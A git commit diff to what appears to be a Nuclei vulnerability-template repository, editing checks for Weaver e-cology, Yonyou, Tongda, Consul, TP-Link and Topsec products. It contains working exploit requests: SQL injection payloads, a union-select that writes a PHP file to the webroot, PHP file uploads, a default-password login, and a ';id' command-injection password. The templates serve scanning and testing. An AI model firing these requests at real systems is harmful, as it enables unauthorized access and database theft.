updated templates

2023-09-17 21:41:07 +05:30 · 2023-09-17 21:41:07 +05:30 · b96825a291
parent 274c14e763
commit b96825a291
35 changed files with 94 additions and 267 deletions
--- a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
+++ b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
@ -1,79 +0,0 @@
 id: yonyou-nc-bshservlet-full-check
 info:
  name: yonyou-nc-bshservlet-full-check
  author: SleepingBag945
  severity: critical
  description: 测试所有BshServlet RCE端点
  reference:
    - https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt
  tags: yonyou,nc
 http:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "BeanShell Test Servlet"
      - type: status
        status:
          - 200
--- a/http/cnvd/2022/CNVD-2022-43245.yaml
+++ b/http/cnvd/2022/CNVD-2022-43245.yaml
@ -28,12 +28,12 @@ http:
    matchers:
      - type: word
        part: body
-        words :
+        words:
          - "<methodResponse><params><param><value><base64>"
      - type: word
        part: header
-        words :
+        words:
          - "text/xml"
      - type: status
--- a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml
+++ b/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml
@ -1,14 +1,14 @@
 id: tp-link-tl-r470gp-ac-default-login
 info:
-  name: TP-LINK TL-R470GP-AC Default weak password
+  name: TP-LINK TL-R470GP-AC - Default Login
  author: SleepingBag945
  severity: high
  description: |
    TP-LINK TL-R470GP-AC 默认口令123456
  metadata:
    fofa-query: title="TL-R470GP-AC"
-  tags: tp-link,default-login,ac
+  tags: tp-link,default-login,router
 http:
  - raw:
@ -17,12 +17,9 @@ http:
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Connection: close
        {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
@ -30,5 +27,3 @@ http:
          - "\"stok\""
          - "\"error_code\":0"
        condition: and
--- a/http/vulnerabilities/other/consul-rexec-rce.yaml
+++ b/http/vulnerabilities/other/consul-rexec-rce.yaml
@ -1,34 +0,0 @@
 id: consul-rexec-rce
 info:
  name: Consul Rexec RCE
  author: SleepingBag945
  severity: critical
  description: |
    Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
  metadata:
    fofa-query: protocol="consul(http)"
  tags: rce
 http:
  - raw:
      - |
        GET /v1/agent/self  HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"EnableRemoteScriptChecks":true'
        condition: and
      - type: status
        status:
          - 200
 # msf
 # search Hashicorp
 # exploit/multi/misc/consul_service_exec
--- a/http/vulnerabilities/other/consul-service-rce.yaml
+++ b/http/vulnerabilities/other/consul-service-rce.yaml
@ -1,35 +0,0 @@
 id: consul-service-rce
 info:
  name: consul-service-rce
  author: SleepingBag945
  severity: critical
  description: |
    Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
  metadata:
    fofa-query: protocol="consul(http)"
  tags: rce
 http:
  - raw:
      - |
        GET /v1/agent/self  HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"EnableScriptChecks\": true"
          - "\"EnableRemoteScriptChecks\": true"
        condition: or
      - type: status
        status:
          - 200
 # msf
 # search Hashicorp
 # exploit/multi/misc/consul_service_exec
--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@ -1,5 +1,4 @@
 id: ruijie-nbr-fileupload
 info:
  name: Ruijie NBR fileupload.php - Arbitrary File Upload
  author: SleepingBag945
--- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
@ -13,7 +13,7 @@ info:
    max-request: 1
    verified: true
    fofa-query: app="TDXK-通达OA"
-  tags: tongda,fileupload,intrusive
+  tags: tongda,fileupload,intrusive,router
 variables:
  num: "999999999"
@ -59,6 +59,7 @@ http:
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(num)}}'
--- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
@ -23,15 +23,24 @@ http:
        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
      - |
        POST /general/document/index.php/recv/register/insert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
    matchers-condition: and
    matchers:
      - type: word
-        part: header
+        part: header_1
        words:
          - "PHPSESSID="
          - "register_for/?rid="
        condition: and
-      - type: status
+      - type: word
-        status:
+        part: header_2
-          - 302
+        words:
          - "register_for/?rid="
        negative: true
--- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
@ -1,36 +0,0 @@
 id: topsec-topapplb-arbitrary-login
 info:
  name: Topsec TopAppLB Any account Login - Arbitrary Login
  author: SleepingBag945
  severity: high
  description: |
    Any Account can log in to the background.Enter any account on the login page, the password is ;id
  reference:
    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json  
  metadata:
    max-request: 1
    fofa-query: title="TopApp-LB 负载均衡系统"
  tags: topsec,topapplb,misconfig
 http:
  - raw:
      - |
        POST /login_check.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        userName=admin&password=%3Bid
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302 && contains(header_1,"redirect.php")'
        condition: and
--- a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml
@ -1,15 +1,15 @@
-id: weaver-e-cology-verifyquicklogin-arbitrary-login
+id: ecology-verifyquicklogin-auth-bypass
 info:
-  name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
+  name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
  author: SleepingBag945
  severity: high
-  description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞，攻击者通过发送特殊的请求包可以获取管理员Session
+  description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
  metadata:
    fofa-query: app="泛微-协同办公OA"
-  tags: ecology,weaver,oa
+  tags: ecology,weaver,oa,auth-bypass
 http:
  - raw:
@ -23,19 +23,18 @@ http:
        identifier=1&language=1&ipaddress=x.x.x.x
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"sessionkey\":"
      - type: word
        part: body
        words:
          - "\"message\":"
      - type: status
        status:
          - 200
 # Enhanced by md on 2022/10/31
--- a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
@ -1,34 +1,34 @@
 id: weaver-e-cology-validate-sqli
 info:
-  name: weaver-e-cology-validate-sqli
+  name: Weaver e-cology Validate.JSP - SQL Injection
  author: SleepingBag945
  severity: high
-  description: 泛微e-cology OA系统的validate.jsp文件中，因为对参数capitalid过滤不严，可致使SQL注入漏洞。攻击者运用该漏洞，可在未授权的情况下，远程发送精心构造的SQL语句，从而取得数据库敏感信息。
+  description: |
-  tags: ecology,weaver,oa,sqli
+    In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information.
  tags: ecology,weaver,sqli
 variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
 http:
  - raw:
      - |
        POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
        sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "8370114"
+          - "{{result}}"
      - type: status
        status:
          - 200
 # Enhanced by md on 2022/10/31
 # select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
--- a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
@ -43,3 +43,11 @@ http:
          - status_code == 200
          - contains(body,'Windows IP Configuration')
        condition: and
      - type: word
        part: header
        words:
          - "application/json"
          - "text/html"
        negative: true
        condition: and
--- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@ -21,8 +21,8 @@ variables:
 http:
  - method: GET
    path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+  #    - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
    stop-at-first-match: true
    matchers:
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@ -17,7 +17,7 @@ info:
 variables:
  filename: "{{to_lower(rand_base(5))}}"
-  payload: "[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
+  payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
 http:
  - raw:
@ -35,9 +35,7 @@ http:
      - type: word
        part: body_2
        words:
-          - "PHP Version"
+          - "758058d8987e7a9ec723bcdbec6c407e"
          - "PHP Extension"
        condition: and
      - type: status
        status:
--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@ -10,7 +10,7 @@ info:
    max-request: 1
    fofa-query: app="泛微-EOffice"
    verified: true
-  tags: weaver,e-office,oa,instrusive,rce
+  tags: weaver,e-office,intrusive,rce,file-upload
 variables:
  filename: "{{to_lower(rand_base(5))}}"
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@ -12,7 +12,7 @@ info:
    max-request: 1
    fofa-query: app="泛微-EOffice"
    verified: true
-  tags: weaver,e-office,oa,rce,intrusive,file-upload
+  tags: weaver,e-office,oa,rce,intrusive,fileupload
 variables:
  filename: "{{to_lower(rand_base(5))}}"
@ -31,9 +31,7 @@ http:
        Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
        Content-Type: application/octet-stream
-        <?php
+        <?php echo md5(weaver);?>'
        phpinfo();
        ?>
        ------WebKitFormBoundaryLpoiBFy4ANA8daew
        Content-Disposition: form-data;name="FormData"
@ -50,9 +48,7 @@ http:
      - type: word
        part: body_2
        words:
-          - "PHP Version"
+          - "758058d8987e7a9ec723bcdbec6c407e"
          - "PHP Extension"
        condition: and
      - type: status
        status:
--- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
@ -24,8 +24,8 @@ http:
      - type: word
        part: body
        words:
-          - "datapassword"
+          - "datapassword ="
-          - "datauser"
+          - "datauser ="
        condition: and
      - type: status
--- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
@ -11,7 +11,7 @@ info:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
  metadata:
    fofa-query: app="泛微-协同办公OA"
-  tags: ecology,upload,fileupload,intrusive
+  tags: ecology,fileupload,intrusive
 variables:
  filename: "{{to_lower(rand_base(5))}}"
@ -65,7 +65,7 @@ http:
        internal: true
        group: 1
        regex:
-          - "&fileid=(.*?)\'>"
+          - "&fileid=(.*?)\\'>"
    matchers-condition: and
    matchers:
--- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
@ -12,7 +12,7 @@ info:
    max-request: 1
    fofa-query: app="用友-UFIDA-NC"
    verified: true
-  tags: yonyou,fileupload,intrusive
+  tags: yonyou,file-upload,intrusive
 variables:
  file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
--- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
@ -9,6 +9,11 @@ info:
    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
  tags: yonyou,grp,xxe,sqli
 variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
 http:
  - raw:
      - |
@ -17,13 +22,14 @@ http:
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
-        cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
+        cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "1759837260"
+          - "{{result}}"
      - type: word
        words:
--- a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
@ -10,7 +10,7 @@ info:
    max-request: 2
    fofa-query: body="用友U8CRM"
    verified: true
-  tags: yonyou,fileupload,u8-crm
+  tags: yonyou,file-upload,u8-crm,intrusive
 http:
  - raw: